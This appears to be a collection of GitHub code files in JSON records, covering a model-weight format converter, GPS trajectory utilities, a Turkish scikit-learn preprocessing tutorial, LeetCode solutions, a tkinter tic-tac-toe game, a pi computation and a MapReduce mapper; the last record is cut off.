+{"seq_id":"38476365872","text":"import torch\nfrom safetensors.torch import save_file\n\nMODEL_NAME = './RWKV-4-Pile-430M-20220808-8066'\n\ndef main():\n input = f'{MODEL_NAME}.pth'\n output = f'{MODEL_NAME}.safetensors'\n print(f'* Loading with Torch: {input}')\n model = torch.load(input, map_location = 'cpu')\n print(f'* Saving with SafeTensors: {output}.safetensors')\n save_file(model, output)\n print('* Done.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"KerfuffleV2/smolrsrwkv","sub_path":"utils/pth_to_safetensors.py","file_name":"pth_to_safetensors.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"78"} +{"seq_id":"2706612731","text":"import os.path\nfrom datetime import datetime, timedelta\nfrom common.spatial_func import distance, SPoint\nfrom common.mbr import MBR\nfrom map_matching.candidate_point import CandidatePoint\nfrom common.spatial_func import cal_loc_along_line\nimport pandas as pd\n\n\nclass STPoint(SPoint):\n def __init__(self, lat, lng, time, data=None):\n super(STPoint, self).__init__(lat, lng)\n self.time = time\n self.data = data\n\n def __str__(self):\n return '({}, {}, {}, {})'.format(self.time.strftime('%Y/%m/%d %H:%M:%S'), self.lat, self.lng, self.data)\n\n\nclass Trajectory:\n def __init__(self, oid, pid, pt_list):\n self.oid = pid\n self.pid = pid\n self.pt_list = pt_list\n\n def get_duration(self):\n return (self.pt_list[-1].time - self.pt_list[0].time).total_seconds()\n\n def get_length(self):\n if len(self.pt_list) <= 1:\n return 0.0\n else:\n dist = 0.0\n pre_pt = None\n for pt in self.pt_list:\n if pre_pt is None:\n pre_pt = pt\n else:\n tmp_dist = distance(pre_pt, pt)\n dist += tmp_dist\n pre_pt = pt\n return dist\n\n def get_time_interval(self):\n point_time_interval = []\n for pre, cur in zip(self.pt_list[:-1], self.pt_list[1:]):\n point_time_interval.append((cur.time - pre.time).total_seconds())\n return sum(point_time_interval) / len(point_time_interval)\n\n def get_distance_interval(self):\n point_dist_interval = []\n for pre, cur in zip(self.pt_list[:-1], self.pt_list[1:]):\n point_dist_interval.append(distance(pre, cur))\n return sum(point_dist_interval) / len(point_dist_interval)\n\n def get_mbr(self):\n return MBR.cal_mbr(self.pt_list)\n\n def get_start_time(self):\n return self.pt_list[0].time\n\n def get_end_time(self):\n return self.pt_list[-1].time\n\n def get_mid_time(self):\n return self.pt_list[0].time + (self.pt_list[-1].time - self.pt_list[0].time) / 2.0\n\n def get_centroid(self):\n mean_lat = 0.0\n mean_lng = 0.0\n for pt in self.pt_list:\n mean_lat += pt.lat\n mean_lng += pt.lng\n mean_lat /= len(self.pt_list)\n mean_lng /= len(self.pt_list)\n return SPoint(mean_lat, mean_lng)\n\n def query_trajectory_by_temporal_range(self, start_time, end_time):\n # start_time <= pt.time < end_time\n traj_start_time = self.get_start_time()\n traj_end_time = self.get_end_time()\n if start_time > traj_end_time:\n return None\n if end_time <= traj_start_time:\n return None\n st = max(traj_start_time, start_time)\n et = min(traj_end_time + timedelta(seconds=1), end_time)\n start_idx = self.binary_search_idx(st) # pt_list[start_idx].time <= st < pt_list[start_idx+1].time\n if self.pt_list[start_idx].time < st:\n # then the start_idx is out of the range, we need to increase it\n start_idx += 1\n end_idx = self.binary_search_idx(et) # pt_list[end_idx].time <= et < pt_list[end_idx+1].time\n if self.pt_list[end_idx].time < et:\n # then the end_idx is acceptable\n end_idx += 1\n sub_pt_list = self.pt_list[start_idx:end_idx]\n return Trajectory(self.pid, sub_pt_list)\n\n def binary_search_idx(self, time):\n # self.pt_list[idx].time <= time < self.pt_list[idx+1].time\n # if time < self.pt_list[0].time, return -1\n # if time >= self.pt_list[len(self.pt_list)-1].time, return len(self.pt_list)-1\n nb_pts = len(self.pt_list)\n if time < self.pt_list[0].time:\n return -1\n if time >= self.pt_list[-1].time:\n return nb_pts - 1\n # the time is in the middle\n left_idx = 0\n right_idx = nb_pts - 1\n while left_idx <= right_idx:\n mid_idx = int((left_idx + right_idx) / 2)\n if mid_idx < nb_pts - 1 and self.pt_list[mid_idx].time <= time < self.pt_list[mid_idx + 1].time:\n return mid_idx\n elif self.pt_list[mid_idx].time < time:\n left_idx = mid_idx + 1\n else:\n right_idx = mid_idx - 1\n\n def query_location_by_timestamp(self, time):\n idx = self.binary_search_idx(time)\n if idx == -1 or idx == len(self.pt_list) - 1:\n return None\n if self.pt_list[idx].time == time or (self.pt_list[idx+1].time - self.pt_list[idx].time).total_seconds() == 0:\n return SPoint(self.pt_list[idx].lat, self.pt_list[idx].lng)\n else:\n # interpolate location\n dist_ab = distance(self.pt_list[idx], self.pt_list[idx+1])\n if dist_ab == 0:\n return SPoint(self.pt_list[idx].lat, self.pt_list[idx].lng)\n dist_traveled = dist_ab * (time - self.pt_list[idx].time).total_seconds() / \\\n (self.pt_list[idx+1].time - self.pt_list[idx].time).total_seconds()\n return cal_loc_along_line(self.pt_list[idx], self.pt_list[idx+1], dist_traveled / dist_ab)\n\n def to_wkt(self):\n wkt = 'LINESTRING ('\n for pt in self.pt_list:\n wkt += '{} {}, '.format(pt.lng, pt.lat)\n wkt = wkt[:-2] + ')'\n return wkt\n\n def __hash__(self):\n return hash(self.pid + '_' + self.pt_list[0].time.strftime('%Y%m%d%H%M%S') + '_' +\n self.pt_list[-1].time.strftime('%Y%m%d%H%M%S'))\n\n def __eq__(self, other):\n return hash(self) == hash(other)\n\n def __repr__(self):\n return f'Trajectory(pid={self.pid})'\n\n\ndef get_tid(oid, pt_list):\n return oid + '_' + pt_list[0].time.strftime('%Y%m%d%H%M%S') + '_' + pt_list[-1].time.strftime('%Y%m%d%H%M%S')\n\n\ndef traj_point_dist(traj, pt, method='centroid'):\n if method == 'nearest':\n dists = []\n for t_pt in traj.pt_list:\n dists.append(distance(t_pt, pt))\n return min(dists)\n elif method == 'centroid':\n return distance(pt, traj.get_centroid())\n\n\ndef parse_traj_file(input_path, traj_type='raw', extra_fields=None):\n assert traj_type in ['raw', 'mm'], 'only `raw` or `mm` is supported'\n\n time_format = '%Y-%m-%d %H:%M:%S'\n df = pd.read_csv(input_path)\n pid = df['plan_no'].values[0]\n oid = pid\n trajs = []\n pt_list = []\n for index, value in df.iterrows():\n lat = float(value['latitude'])\n lng = float(value['longitude'])\n pt = STPoint(lat, lng, datetime.strptime(value['start_stay'], time_format), None)\n pt_list.append(pt)\n if len(pt_list) != 0:\n traj = Trajectory(oid, pid, pt_list)\n trajs.append(traj)\n return trajs\n\n\ndef store_traj_file(trajs, target_path, target_path_path, filename, traj_type='raw'):\n assert traj_type in ['raw', 'mm'], 'only `raw` or `mm` is supported'\n\n time_format = '%Y-%m-%d %H:%M:%S'\n data = []\n for traj, path in trajs:\n pt_list = traj.pt_list\n for pt in pt_list:\n candi_pt = pt.data['candi_pt']\n if candi_pt is not None:\n data.append([pt.time.strftime(time_format), pt.lat, pt.lng, candi_pt.eid, candi_pt.lat, candi_pt.lng,\n candi_pt.error, candi_pt.offset])\n else:\n data.append([pt.time.strftime(time_format), pt.lat, pt.lng, None, None, None, None, None])\n df = pd.DataFrame(data=data, columns=['timestamp', 'latitude', 'longitude', 'eid', 'candi_pt_lat',\n 'candi_pt_lon', 'candi_pt_error', 'candi_pt_offset'])\n df.to_csv(target_path, index=False)\n\n\n for index, p in enumerate(path):\n p_data = []\n for p_entity in p.path_entities:\n p_data.append([p_entity.eid, str(p_entity.enter_time), str(p_entity.leave_time)])\n df_path = pd.DataFrame(data=p_data, columns=['eid', 'enter_time', 'leave_time'])\n tmp_filename = str(index)+'_'+filename\n df_path.to_csv(os.path.join(target_path_path, tmp_filename), index=False)\n","repo_name":"too2/DLInfMA_Refactoring","sub_path":"tptk/common/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8136563338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 09:35:53 2019\n\n2 sütundan oluşan bir veri seti düşünelim. 1. sütun [1-10] arasında değerlere alırken , 2. sütun [1-10000] arasında değerler alsın. \nAğırlık (weight) 2.sütundaki hatalar daha büyük olacağından bu sütuna göre optmize edilecek ve algoritma daha fazla sürede işlemi tamamlayacaktır. \nBu ise egitimde sapma yapacaktir.\nBunu engellemek icin StandardScaler kullanilir.\nScandardScaler -> Ortalama ve birim varyansi kullanrak ölçeklendirme özelliklerini standartlaştırır.\n\"\"\"\n# 1-kutuphaneler\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 2- veri on isleme\n\n# 2.1- veri yukleme\nveriler = pd.read_csv('veriler.csv')\neksikveriler = pd.read_csv('eksik_veriler.csv')\n\n\n# veri on isleme\nboy = veriler[['boy']]\nprint (boy)\n\nboykilo = veriler[['boy','kilo']]\nprint(boykilo)\n\n\n# eksik veriler icin \nfrom sklearn.preprocessing import Imputer \n\nimputer = Imputer(missing_values=\"NaN\",strategy = \"mean\",axis=0)\n\nYasboykilo = eksikveriler.iloc[:,1:4].values # yalnizca sayisal olan kolonlar alinir [satir:satir,kolon:kolon]\nprint(Yasboykilo)\nimputer = imputer.fit(Yasboykilo[:,1:4]) # her kolon icin ort hesapla\nYasboykilo[:,1:4] = imputer.transform(Yasboykilo[:,1:4]) # parametre degisikligini uygula\nprint(Yasboykilo)\n\n\n# encoder : Kategoric -> Numeric\n\nulke = veriler.iloc[:,0:1].values\nprint(ulke)\n\nfrom sklearn.preprocessing import LabelEncoder\nlb = LabelEncoder() \nulke[:,0] = lb.fit_transform(ulke[:,0])\nprint(ulke)\n\nfrom sklearn.preprocessing import OneHotEncoder\nulke = veriler.iloc[:,0:1].values\nohe = OneHotEncoder(categorical_features = \"all\")\nulke= ohe.fit_transform(ulke[:,0:1]).toarray() # nominal degrelerden kolon bazli degerler olusturuldu\nprint(ulke)\n\n# print(list(range(22))) 0-21 sayilari verir\n\n# numpy dizileri dataframe donusumu\nsonuc = pd.DataFrame(data = ulke, index = range(22), columns = ['fr','tr','us']) # OneHotEncoder verilerinden dataframe olusturulur\nprint (sonuc)\n\nsonuc2 = pd.DataFrame(data = Yasboykilo, index = range(22), columns = ['boy','kilo','yas'])\nprint(sonuc2)\n\ncinsiyet = veriler.iloc[:,-1:].values\n\nprint(cinsiyet)\nsonuc3 = pd.DataFrame(data = cinsiyet, index=range(22),columns = ['cinsiyet'])\nprint(sonuc3)\n\n\n# concat ile dataframe birlestirme\ns = pd.concat([sonuc,sonuc2],axis = 1)\nprint(s)\n\ns2 = pd.concat([s,sonuc3],axis =1)\nprint(s2)\n\n\n# amac train ile boyyaskilo yu iceren df (s) ile egitmek ve sonuc3 df'mini bulmasini istiyoruz\n# sklearn.cross_validation da kullanilan train_test_split, sklearn.model_selection 'a tasinmis\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(s,sonuc3,test_size = 0.33, random_state = 0) # s ve sonuc3 df mi parcalanmali\n# literaturde test icin 1/3 iken train icin 2/3 kullanilir\n\n# verilerin olceklenmesi\nfrom sklearn.preprocessing import StandardScaler\n\nsc = StandardScaler()\nX_train = sc.fit_transform(x_train)\nX_test = sc.fit_transform(x_test)\n\n\n\n\n\n\n\n\n\n","repo_name":"fbasatemur/Machine_Learning","sub_path":"Machine Learning/01- Veri On Isleme (Data Preprocessing)/tutorial13-oznitelik olcekleme.py","file_name":"tutorial13-oznitelik olcekleme.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5688157755","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isValidBST(self, root: Optional[TreeNode]) -> bool:\n if not root:\n return True\n \n if not self.check(root.right, root.val, True) or not self.check(root.left, root.val, False):\n return False\n \n return self.isValidBST(root.right) and self.isValidBST(root.left)\n\n def check(self, node, val, greater):\n if not node:\n return True\n\n if greater and node.val <= val:\n return False\n if not greater and node.val >= val:\n return False\n \n return self.check(node.left, val, greater) and self.check(node.right, val, greater)","repo_name":"raymond212/leetcode-solutions","sub_path":"python/0098_Validate_Binary_Search_Tree.py","file_name":"0098_Validate_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"27856888784","text":"# https://programmers.co.kr/learn/courses/30/lessons/12899\n\ndef solution(n): # 3진수 구하는 문제와 비슷\n if n <= 3:\n return \"124\"[n - 1]\n else:\n q, r = divmod(n - 1, 3) # 3진법에는 0이없기때문에 divmod(n - 1)을 함\n return solution(q) + \"124\"[r]\n\n\nprint(solution(7))\n","repo_name":"thecode00/Algorithm-Problem-Solve","sub_path":"Programmers/Python/Level 2/124 나라의 숫자/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6129766981","text":"import tkinter as tk\r\nfrom tkinter import*\r\n\r\n\r\n\r\n\r\ngame = tk.Tk()\r\ngame.resizable(False, False)\r\ngame.title(\"Tic tac toe\")\r\ngame.iconbitmap(\"test.ico\")\r\n\r\nmenubar = Menu(game)\r\n\r\nmenu1 = Menu(menubar, tearoff=0)\r\nmenu1.add_command(label=\"Jouer contre un autre joueur\")\r\nmenu1.add_command(label=\"Jouer contre l'ordinateur\")\r\nmenu1.add_command(label=\"Niveau de l'ordinateur\")\r\nmenu1.add_command(label=\"Recommencer\")\r\nmenu1.add_separator()\r\nmenu1.add_command(label=\"Quitter\", command=game.quit)\r\nmenubar.add_cascade(label=\"Options\", menu=menu1)\r\n\r\nmenu2 = Menu(menubar, tearoff=0)\r\nmenu2.add_command(label=\"Score\")\r\nmenu2.add_command(label=\"Historique\")\r\nmenu2.add_command(label=\"Tic Tac Toe Premium à seulement 24€99 par mois\")\r\nmenubar.add_cascade(label=\"Historique\", menu=menu2)\r\n\r\nmenu3 = Menu(menubar, tearoff=0)\r\nmenu3.add_command(label=\"Règles du jeu\")\r\nmenubar.add_cascade(label=\"Aide\", menu=menu3)\r\n\r\ngame.config(menu=menubar)\r\ntk.Label(game, text=\"Tic Tac Toe\", font=('Ariel', 25)).pack()\r\nstatus_label = tk.Label(game, text=\"Au tour de X\", font=('Ariel', 15), bg='grey', fg='ivory')\r\nstatus_label.pack(fill=tk.X)\r\n\r\ndef play_again():\r\n print(\"here we go!\")\r\n status_label.configure(text=\"Au tour du joueur X\", bg='blue', fg='ivory')\r\n global player\r\n global checklist\r\n global XO_list\r\n player = 'X'\r\n \r\n button0.configure(state= NORMAL, text=\"\", bg='grey')\r\n button1.configure(state= NORMAL, text=\"\", bg='grey')\r\n button2.configure(state= NORMAL, text=\"\", bg='grey')\r\n button3.configure(state= NORMAL, text=\"\", bg='grey')\r\n button4.configure(state= NORMAL, text=\"\", bg='grey')\r\n button5.configure(state= NORMAL, text=\"\", bg='grey')\r\n button6.configure(state= NORMAL, text=\"\", bg='grey')\r\n button7.configure(state= NORMAL, text=\"\", bg='grey')\r\n button8.configure(state= NORMAL, text=\"\", bg='grey')\r\n checklist = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\n XO_list = []\r\n buttonReset.pack_forget()\r\nbuttonReset = tk.Button(game, text='Rejouer ?', font=('Ariel', 15),bg='yellow', width=8, height=4, command=play_again)\r\n \r\n\r\nplayer = \"X\"\r\ncomputer = 0\r\nglobal pos\r\nX_list = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nO_list = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nXO_list = []\r\nAI_list = []\r\nchecklist = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\r\nchecklist2 = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\ngame.geometry(\"500x500\")\r\n\r\ncondition = False\r\ncondition2 = False\r\ndef check_win():\r\n if condition==True:\r\n print(\"game over!\")\r\n else:\r\n print(\"continue\")\r\n\r\ndef check_win2():\r\n if condition2==True:\r\n print(\"game over!\")\r\n else:\r\n print(\"continue\")\r\n \r\ndef test_condition():\r\n if (checklist[0] == checklist[1] == checklist[2] == \"X\" or\r\n checklist[3] == checklist[4] == checklist[5] == \"X\" or\r\n checklist[6] == checklist[7] == checklist[8] == \"X\" or\r\n checklist[0] == checklist[3] == checklist[6] == \"X\" or\r\n checklist[1] == checklist[4] == checklist[7] == \"X\" or\r\n checklist[2] == checklist[5] == checklist[8] == \"X\" or\r\n checklist[0] == checklist[4] == checklist[8] == \"X\" or\r\n checklist[2] == checklist[4] == checklist[6] == \"X\"):\r\n condition==True\r\n print (\"game over, X a gagné!\")\r\n status_label.configure(text=\"X a gagné !\", bg='blue')\r\n reset()\r\n elif (checklist[0] == checklist[1] == checklist[2] == \"O\" or\r\n checklist[3] == checklist[4] == checklist[5] == \"O\" or\r\n checklist[6] == checklist[7] == checklist[8] == \"O\" or\r\n checklist[0] == checklist[3] == checklist[6] == \"O\" or\r\n checklist[1] == checklist[4] == checklist[7] == \"O\" or\r\n checklist[2] == checklist[5] == checklist[8] == \"O\" or\r\n checklist[0] == checklist[4] == checklist[8] == \"O\" or\r\n checklist[2] == checklist[4] == checklist[6] == \"O\"):\r\n condition==True\r\n print (\"game over, O a gagné!\")\r\n status_label.configure(text=\"O a gagné!\", bg='red')\r\n reset()\r\n elif len(XO_list)==9:\r\n print(\"égalité!\")\r\n status_label.configure(text=\"Egalité !\", bg='green')\r\n reset()\r\n\r\n \r\n if (checklist2[0] == checklist2[1] == checklist2[2] == 1 or\r\n checklist2[3] == checklist2[4] == checklist2[5] == 1 or\r\n checklist2[6] == checklist2[7] == checklist2[8] == 1 or\r\n checklist2[0] == checklist2[3] == checklist2[6] == 1 or\r\n checklist2[1] == checklist2[4] == checklist2[7] == 1 or\r\n checklist2[2] == checklist2[5] == checklist2[8] == 1 or\r\n checklist2[0] == checklist2[4] == checklist2[8] == 1 or\r\n checklist2[2] == checklist2[4] == checklist2[6] == 1 ):\r\n condition2==True\r\n \r\n \r\n \r\ndef symbol_player():\r\n global player\r\n \r\n if player == 'X':\r\n \r\n XO_list.append('X')\r\n print(XO_list)\r\n print(checklist)\r\n print(checklist2)\r\n player = \"O\"\r\n status_label.configure(text=\"Au tour du joueur O\", bg='red', fg='ivory')\r\n elif player == \"O\":\r\n \r\n XO_list.append('O')\r\n print(XO_list)\r\n print(checklist)\r\n player = \"X\"\r\n status_label.configure(text=\"Au tour du joueur X\", bg='blue', fg='ivory')\r\ncheck_win()\r\ncheck_win2()\r\n\r\n\r\ndef click0():\r\n print(\"0\")\r\n button0.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[0] = player\r\n checklist2[0] = 1\r\n \r\n \r\n\r\ndef click1():\r\n print(\"1\")\r\n button1.configure(bg=\"ivory\", text = player,fg = 'black',state= DISABLED)\r\n checklist[1] = player\r\n checklist2[1] = 1\r\n \r\n\r\n\r\ndef click2():\r\n print(\"2\")\r\n button2.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[2] = player\r\n checklist2[2] = 1\r\n \r\n\r\ndef click3():\r\n print(\"3\")\r\n button3.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[3] = player\r\n checklist2[3] = 1\r\n \r\n\r\ndef click4():\r\n print(\"4\")\r\n button4.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[4] = player\r\n checklist2[4] = 1\r\n \r\n\r\ndef click5():\r\n print(\"5\")\r\n button5.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[5] = player\r\n checklist2[5] = 1\r\n \r\n\r\ndef click6():\r\n print(\"6\")\r\n button6.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[6] = player\r\n checklist2[6] = 1\r\n \r\n\r\ndef click7():\r\n print(\"7\")\r\n button7.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[7] = player\r\n checklist2[7] = 1\r\n \r\n\r\ndef click8():\r\n print(\"8\")\r\n button8.configure(bg=\"ivory\", text = player, fg = 'black',state= DISABLED)\r\n checklist[8] = player\r\n checklist2[8] = 1\r\n \r\n \r\ndef set(self):\r\n print('ok')\r\n \r\n\r\n\r\nbutton0 = tk.Button(game, text =\"\", bg='grey', width=10, height=5, command=lambda:[click0(),symbol_player(), test_condition()])\r\nbutton0.place(x=100, y=100)\r\n\r\nbutton1 = tk.Button(game, text =\"\",bg='grey', width=10, height=5,command=lambda:[click1(),symbol_player(), test_condition()])\r\nbutton1.place(x=200, y=100)\r\n\r\nbutton2 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click2(),symbol_player(), test_condition()])\r\nbutton2.place(x=300, y=100)\r\n\r\nbutton3 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click3(),symbol_player(), test_condition()])\r\nbutton3.place(x=100, y=200)\r\n\r\nbutton4 = tk.Button(game, text =\"\",bg='grey', width=10, height=5,command=lambda:[click4(),symbol_player(), test_condition()])\r\nbutton4.place(x=200, y=200)\r\n\r\nbutton5 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click5(),symbol_player(), test_condition()])\r\nbutton5.place(x=300, y=200)\r\n\r\nbutton6 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click6(),symbol_player(), test_condition()])\r\nbutton6.place(x=100, y=300)\r\n\r\nbutton7 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click7(),symbol_player(), test_condition()])\r\nbutton7.place(x=200, y=300)\r\n\r\nbutton8 = tk.Button(game, text =\"\",bg='grey', width=10, height=5, command=lambda:[click8(),symbol_player(), test_condition()])\r\nbutton8.place(x=300, y=300)\r\n\r\n\r\n\r\ndef reset():\r\n \r\n global buttonReset\r\n print(\"Jouer encore ?\")\r\n buttonReset.pack()\r\n buttonReset.place(x=200, y=400)\r\n \r\n \r\n \r\ngame.mainloop()","repo_name":"driss-khelfi/tic-tac-toe","sub_path":"tictactoe03.py","file_name":"tictactoe03.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38885617088","text":"#krb factorial\nimport math\n\t\t\ndef\tiFactorial(n):\n\t''' computs factorial using iteration - no parameter checking'''\n\tf = 1\n\tfor i in range(n+1):\n\t\tif(i>0):\n\t\t\tf = f * i\n\treturn f\t\n\t\t\n\n\ndef compute_term(k):\n\t''' computes summation term of ramanujan's infinte series'''\n\tnm = float(iFactorial(4*k)) * (1103.0 + 26390.0 * k)\n\tdn = (float(iFactorial(k)) ** 4) * (396.0 **(4 * k))\n\treturn nm/dn\n\t\ndef compute_pi():\n\tk = 0\n\ts = 0.0\n\tt = compute_term(k)\n\twhile t > 1e-15:\n\t\ts = s + t\n\t\tk = k + 1\n\t\tt = compute_term(k)\n\tpi = ((2.0 * math.sqrt(2.0))/9801.0) * s\n\treturn 1/pi\n\t\t\nprint(\"pi = \" , compute_pi(),math.pi)\n\t\n","repo_name":"kbergerstock/myProjects","sub_path":"projects.python/thinkCSpy.examples/compute_pi.py","file_name":"compute_pi.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22961823152","text":"\"\"\"\nhttps://leetcode.com/problems/maximal-square/\n\nGiven an m x n binary matrix filled with 0's and 1's, \nfind the largest square containing only 1's and return its area.\n\nExample 1:\nInput: matrix = [\n [\"1\",\"0\",\"1\",\"0\",\"0\"],\n [\"1\",\"0\",\"1\",\"1\",\"1\"],\n [\"1\",\"1\",\"1\",\"1\",\"1\"],\n [\"1\",\"0\",\"0\",\"1\",\"0\"]\n]\nOutput: 4\n\nExample 2:\nInput: matrix = [[\"0\",\"1\"],[\"1\",\"0\"]]\nOutput: 1\n\nExample 3:\nInput: matrix = [[\"0\"]]\nOutput: 0\n\nConstraints:\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 300\nmatrix[i][j] is '0' or '1'.\n\"\"\"\nfrom typing import List\nfrom copy import deepcopy\nfrom functools import lru_cache\n\n\ndef print_matrix(mat):\n print()\n for row in mat:\n print(\" \" + \" \".join(f\"{v:>3}\" for v in row))\n print()\n\n\ndef brute_force(matrix: List[List[int]]) -> int:\n # Time complexity: O(m²n²)\n # Space complexity: O(1)\n pass\n\n\ndef dp_memoization(matrix: List[List[int]]) -> int:\n # Dynamic programming - Memoization\n # Time complexity: O(mn)\n # Space complexity: O(mn)\n\n @lru_cache(maxsize=None)\n def dfs(r: int, c: int) -> int:\n if r == rows or c == cols or matrix[r][c] == 0:\n return 0\n return 1 + min(dfs(r + 1, c), dfs(r, c + 1), dfs(r + 1, c + 1))\n\n rows, cols = len(matrix), len(matrix[0])\n max_side = 0\n for r in range(rows):\n for c in range(cols):\n current = dfs(r, c)\n if current > max_side:\n max_side = current\n\n return max_side * max_side\n\n\ndef dp_tabulation(matrix: List[List[int]]) -> int:\n # Dynamic programming - Memoization\n # Time complexity: O(mn)\n # Space complexity: O(mn)\n\n rows, cols = len(matrix), len(matrix[0])\n\n dp = [[0] * (cols + 1) for _ in range(rows + 1)]\n max_side = 0\n for r in range(1, rows + 1):\n for c in range(1, cols + 1):\n if matrix[r - 1][c - 1]:\n min_neighbor = min(dp[r - 1][c], dp[r - 1][c - 1], dp[r][c - 1])\n dp[r][c] = 1 + min_neighbor\n\n if dp[r][c] > max_side:\n max_side = dp[r][c]\n\n # print_matrix(dp)\n return max_side * max_side\n\n\ndef dp_tabulation_opt(matrix: List[List[int]]) -> int:\n # Dynamic programming - Memoization\n # Time complexity: O(mn)\n # Space complexity: O(1)\n # Modify the input list `matrix` to store partial results\n\n rows, cols = len(matrix), len(matrix[0])\n\n # Special cases\n if rows == 1:\n return max(matrix[0])\n if cols == 1:\n return max(row[0] for row in matrix)\n\n max_side = 0\n # Check for ones in the first row and columns, and initialize\n # `max_side` to 1 if so\n if any(v for v in matrix[0]) or any(row[0] for row in matrix):\n max_side = 1\n\n # Loop over the elements of the `matrix`, skipping the first\n # row and column (already handled)\n for r in range(1, rows):\n for c in range(1, cols):\n if matrix[r][c]:\n matrix[r][c] = 1 + min(\n matrix[r][c - 1], matrix[r - 1][c - 1], matrix[r - 1][c]\n )\n if matrix[r][c] > max_side:\n max_side = matrix[r][c]\n # print_matrix(matrix)\n return max_side * max_side\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Maximal square\")\n print(\"-\" * 60)\n\n test_cases = [\n ([[0]], 0),\n ([[1]], 1),\n ([[0, 1, 1]], 1),\n ([[0, 1], [1, 1]], 1),\n ([[0, 1], [1, 0]], 1),\n ([[1, 1], [1, 1]], 4),\n ([[1, 1, 1], [1, 0, 0], [1, 0, 0]], 1),\n ([[0, 1, 1], [1, 0, 0], [1, 0, 0]], 1),\n ([[1, 1, 0], [1, 1, 1], [1, 1, 1]], 4),\n ([[1, 1, 1], [1, 1, 1], [1, 1, 1]], 9),\n ([[1, 1, 1], [1, 1, 1], [1, 1, 0]], 4),\n ([[1, 1, 0, 1], [1, 1, 1, 1], [1, 1, 1, 1]], 4),\n ([[1, 1, 0, 1], [0, 1, 0, 1], [1, 0, 1, 0]], 1),\n ([[1, 0, 1, 0, 0], [1, 0, 1, 1, 1], [1, 1, 1, 1, 1], [1, 0, 0, 1, 0]], 4),\n ]\n\n for matrix, solution in test_cases:\n\n print(\"Matrix:\")\n print_matrix(matrix)\n\n result = dp_memoization(deepcopy(matrix))\n output = f\"\\t dp_memoization = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dp_tabulation(deepcopy(matrix))\n output = f\"\\t dp_tabulation = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dp_tabulation_opt(deepcopy(matrix))\n output = f\"\\t dp_tabulation_opt = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (55 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"dynamic_programming/minmax/max_square.py","file_name":"max_square.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29156075455","text":"#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\n\ndef clr_spaces(x):\n x = x.replace(\"\\n\", \"\")\n x = x.replace(\"\\r\", \"\")\n return x\n\ndef amount(x):\n return clr_spaces(x[1]) + \"*\" + clr_spaces(x[0])\n\nfor line in sys.stdin:\n result = line.split(',')\n print(amount(result))\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-jdbuilesm","sub_path":"pregunta_03/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73043825533","text":"from collections import defaultdict\nfrom dataclasses import dataclass, field, replace\nfrom typing import 